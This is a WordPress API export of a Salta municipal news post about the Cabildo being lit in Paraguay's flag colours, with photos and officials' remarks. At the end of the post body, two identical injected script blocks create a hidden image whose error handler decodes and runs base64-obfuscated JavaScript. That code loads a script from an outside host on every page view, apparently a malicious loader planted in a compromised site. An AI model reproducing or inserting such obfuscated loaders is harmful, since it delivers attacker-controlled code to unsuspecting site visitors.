{"id":2635,"date":"2023-05-16T14:16:03","date_gmt":"2023-05-16T17:16:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2635"},"modified":"2025-08-14T00:16:50","modified_gmt":"2025-08-14T03:16:50","slug":"el-cabildo-se-ilumino-con-los-colores-de-la-bandera-de-paraguay","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2635","title":{"rendered":"El Cabildo se ilumin\u00f3 con los colores de la bandera de Paraguay"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\"><strong>Fue por el 212\u00b0 aniversario de su independencia. El pueblo de Salta rindi\u00f3 as\u00ed homenaje a la colectividad paraguaya residente en la ciudad. La iluminaci\u00f3n fue organizada por Subsecretar\u00eda de Contenidos junto a la Secretar\u00eda de Cultura y Turismo.<\/strong><\/h4>\n\n\n\n<p>Con motivo de celebrarse el 212\u00b0 aniversario de la Rep\u00fablica de Paraguay, la Municipalidad acompa\u00f1\u00f3 por tercer a\u00f1o consecutivo a su Consulado con la iluminaci\u00f3n del Cabildo Hist\u00f3rico. Fue con los colores de la bandera paraguaya: rojo, blanco y azul.<\/p>\n\n\n\n<p>El homenaje fue organizado por la Subsecretar\u00eda de Contenidos, Participaci\u00f3n Ciudadana y Asuntos Estrat\u00e9gicos junto a la Secretar\u00eda de Cultura y Turismo de la Municipalidad. Durante la iluminaci\u00f3n realizada este lunes al caer el sol, la banda de m\u00fasica 25 de Mayo, ejecut\u00f3 el Himno argentino y del Paraguay, finalizando con una retreta musical para todos los salte\u00f1os y turistas que participaron del homenaje.<\/p>\n\n\n\n<p>El titular de Contenidos, Mat\u00edas Hessling, indic\u00f3 que se est\u00e1 trabajando de manera articulada con V\u00edctor Ben\u00edtez, nuevo ministro consular del Paraguay en Salta, Jujuy, Tucum\u00e1n y Santiago del Estero.<\/p>\n\n\n\n<p>\u201cLa ciudad de Salta saluda a todos los paraguayos que residen en este suelo salte\u00f1o. Nuestro pa\u00eds mantiene una estrecha relaci\u00f3n bilateral con Paraguay. Desde la Municipalidad vamos a trabajar en conjunto con el cuerpo consular y su colectividad para avanzar como pueblo latinoamericano unidos y libres\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Por su parte, Gabriela Gonz\u00e1lez, jefa de Comunidades Migrantes y Asuntos Extranjeros, extendi\u00f3 el saludo de todos los salte\u00f1os al nuevo ministro Consular, V\u00edctor Ben\u00edtez, y se acord\u00f3 agendas culturales conjuntas para los pr\u00f3ximos meses, tal como se viene realizando desde el primer d\u00eda de gesti\u00f3n de la intendenta Bettina Romero.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"2636\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-5.jpeg\" alt=\"\" class=\"wp-image-2636\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-5.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-5-300x169.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-5-768x432.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-5-696x392.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-5-747x420.jpeg 747w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"2637\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-3.jpeg\" alt=\"\" class=\"wp-image-2637\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-3.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-3-300x169.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-3-768x432.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-3-696x392.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-3-747x420.jpeg 747w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"574\" data-id=\"2638\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-2-1024x574-1.jpeg\" alt=\"\" class=\"wp-image-2638\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-2-1024x574-1.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-2-1024x574-1-300x168.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-2-1024x574-1-768x431.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-2-1024x574-1-696x390.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/cabildo-2-1024x574-1-749x420.jpeg 749w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Fue por el 212\u00b0 aniversario de su independencia. El pueblo de Salta rindi\u00f3 as\u00ed homenaje a la colectividad paraguaya residente en la ciudad. La iluminaci\u00f3n fue organizada por Subsecretar\u00eda de Contenidos junto a la Secretar\u00eda de Cultura y Turismo. Con motivo de celebrarse el 212\u00b0 aniversario de la Rep\u00fablica de Paraguay, la Municipalidad acompa\u00f1\u00f3 por [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2638,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-2635","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-temas-relacionados"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2635"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2635"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2635\/revisions"}],"predecessor-version":[{"id":7083,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2635\/revisions\/7083"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2638"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2635"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2635"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2635"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}